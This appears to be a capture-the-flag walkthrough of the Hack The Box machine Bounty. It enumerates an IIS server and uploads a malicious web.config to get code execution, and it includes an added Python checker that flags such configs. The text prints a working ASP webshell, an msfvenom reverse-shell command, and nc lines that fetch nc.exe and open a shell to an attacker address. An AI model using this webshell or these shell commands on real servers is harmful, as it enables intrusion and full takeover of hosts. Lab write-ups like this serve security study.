Overview
- MACHINE TAGS
- Windows
- VBScript
- C
- Web
- Patch Management
Kill Chain
TTPs (Tactics, Techniques & Procedures)
- nmap
- gobuster
- VBScript
- Chimichurri
Phase 1: Enumeration
As usual, start with Nmap. The scan turns up only port 80:
PORT STATE SERVICE
80/tcp open http
Opening it in a browser shows a single image. It looked familiar, but it has been too long to remember where I saw it...
Check the response headers with httpie to get some information about the web server.
Then send an OPTIONS request to see which HTTP methods IIS supports.
The full list of methods is documented at: https://www.tutorialspoint.com/http/http_methods.htm
$ http OPTIONS 10.10.10.93
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Content-Length: 0
Date: Sun, 18 Apr 2021 07:11:41 GMT
Public: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Phase 2: Tooling and exploitation
Phase 2.1: Directory enumeration
OPTIONS, TRACE, GET, HEAD and POST are supported. Nothing exploitable there, so try directory enumeration with gobuster:
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]
Nothing much came of that, so enumerate again with file extensions added:
gobuster dir -u http://10.10.10.93/uploadedfiles -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -x asp,aspx
With -x asp,aspx added, this finds /transfer.aspx.
While searching for IIS-related vulnerabilities I also found that IIS short-name enumeration applies here: https://github.com/lijiejie/IIS_shortname_Scanner.git
The technique is explained at:
http://www.lijiejie.com/iis-win8-3-shortname-brute/
https://www.freebuf.com/articles/web/172561.html
Phase 2.2: File upload bypass
The page has a file upload feature. Proxy it through burp to inspect the request:
Testing shows that any content can be uploaded, so what remains is getting the uploaded file parsed by the server.
Some of the parameters are ASP.NET __VIEWSTATE encoded content. There is a decoder on GitHub: https://github.com/defensahacker/viewstate-decoder, but decoding it yields nothing useful.
Next, look for file extensions that ASP.NET will parse. Google leads to the official documentation, ASP.NET Web Project File Types: https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN
Extract all of the listed extensions:
.asax
.ascx
.ashx
.asmx
.aspx
.axd
.browser
.cd
.compile
.config
.cs
.jsl
.vb
.csproj
.vbproj
.vjsproj
.disco
.vsdisco
.dsdgm
.dsprototype
.dll
.licx
.webinfo
.master
.mdb
.ldb
.mdf
.msgx
.svc
.rem
.resources
.resx
.sdm
.sdmDocument
.sitemap
.skin
.sln
.soap
.asa
.asp
.cdx
.cer
.idc
.shtm
.shtml
.stm
.css
.htm
.html
Iterating over them with the Intruder module, the .config submission is the one whose response length changes:
Quoted from the documentation:
A configuration file (typically Web.config) that contains XML elements representing settings for ASP.NET features.
Phase 2.3: Code execution via .config
Googling for an exploitation method:
https://fgsec.net/posts/Bypass-Upload-Restrictions-and-Evade-Detection/
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
(link no longer works)
Following those articles, upload a test web.config that simply outputs a string:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!--
<%
Response.write("0x584a!")
%>
-->
As can be seen, the string inside the comment block is output, proving that script code in the file is executed. Next, generate a reverse shell payload with msfvenom and append it to the config:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=9900 -f asp -o shell.asp
$ cat shell.asp >> web.config
Alternatively, upload a webshell instead:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="new_policy" path="*.config" verb="GET" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!--
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Run a command through WScript.Shell and return everything it wrote to stdout
Function getCommandOutput(theCommand)
  Dim objShell, objCmdExec
  Set objShell = CreateObject("WScript.Shell")
  Set objCmdExec = objShell.Exec(theCommand)
  getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
' The command comes from the "cmd" request parameter; note the space after /c
szCMD = Request("cmd")
thisDir = getCommandOutput("cmd /c " & szCMD)
Response.Write(thisDir)
%>
-->
Use the webshell to fetch nc and get a connection back:
copy \\10.10.16.4\share\nc.exe c:\windows\temp\nc.exe
c:\windows\temp\nc.exe -e cmd 10.10.16.4 9900
A search with where finds the user flag directly.
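The trick in Phase 2.3 works because the uploaded web.config registers a handler that routes *.config through asp.dll and rolls back the request-filtering rules that normally keep .config files unreachable. As an added example (not part of the original write-up), the following Python audit flags exactly those elements in a config file before an upload is accepted; the sample configs are constructed here in the shape of the payload above.

```python
"""Added defensive example: flag the web.config tricks used above before an upload is accepted."""
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the write-up's payload (not the exact file uploaded there).
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- <% Response.write("test") %> -->
"""

# Constructed benign config: only appSettings, nothing that touches handlers or request filtering.
BENIGN_CONFIG = '<configuration><appSettings><add key="x" value="y" /></appSettings></configuration>'


def audit_web_config(text: str) -> list:
    """Return a list of findings for an uploaded web.config; an empty list means nothing suspicious."""
    findings = []
    # 1. Inline ASP (<% ... %>) anywhere in the file, including inside an XML comment after the root.
    if re.search(r"<%.*?%>", text, re.S):
        findings.append("inline ASP script block found")
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return findings + ["not well-formed XML: %s" % exc]
    for node in root.iter("add"):
        # 2. A handler registration (path + verb) in an upload directory's config is never legitimate:
        #    it is how *.config gets routed to a script engine such as asp.dll.
        if node.get("path") and node.get("verb"):
            findings.append("handler %r maps %r to %r" % (node.get("name"), node.get("path"), node.get("scriptProcessor")))
    for node in root.iter("remove"):
        # 3. Request-filtering rollbacks that make .config / web.config fetchable over HTTP.
        if node.get("fileExtension", "").lower() == ".config":
            findings.append("request filtering: .config removed from blocked extensions")
        if node.get("segment", "").lower() == "web.config":
            findings.append("request filtering: web.config removed from hidden segments")
    return findings
```

Run on the constructed sample this returns four findings (script block, handler mapping and the two request-filtering rollbacks); the benign config returns none.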
Phase 3: Privilege escalation
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
The server version information matches the privilege escalation used on Hackthebox Arctic (https://jgeek.cn/archive/id/66.html), so try Chimichurri.exe, which successfully returns a SYSTEM shell.
References
- https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Basics_of_HTTP/MIME_types
- https://github.com/xMilkPowderx/OSCP/blob/master/File%20upload.md
- http://www.lijiejie.com/iis-win8-3-shortname-brute/
- https://www.freebuf.com/articles/web/172561.html
- https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN
- https://jgeek.cn/archive/id/66.html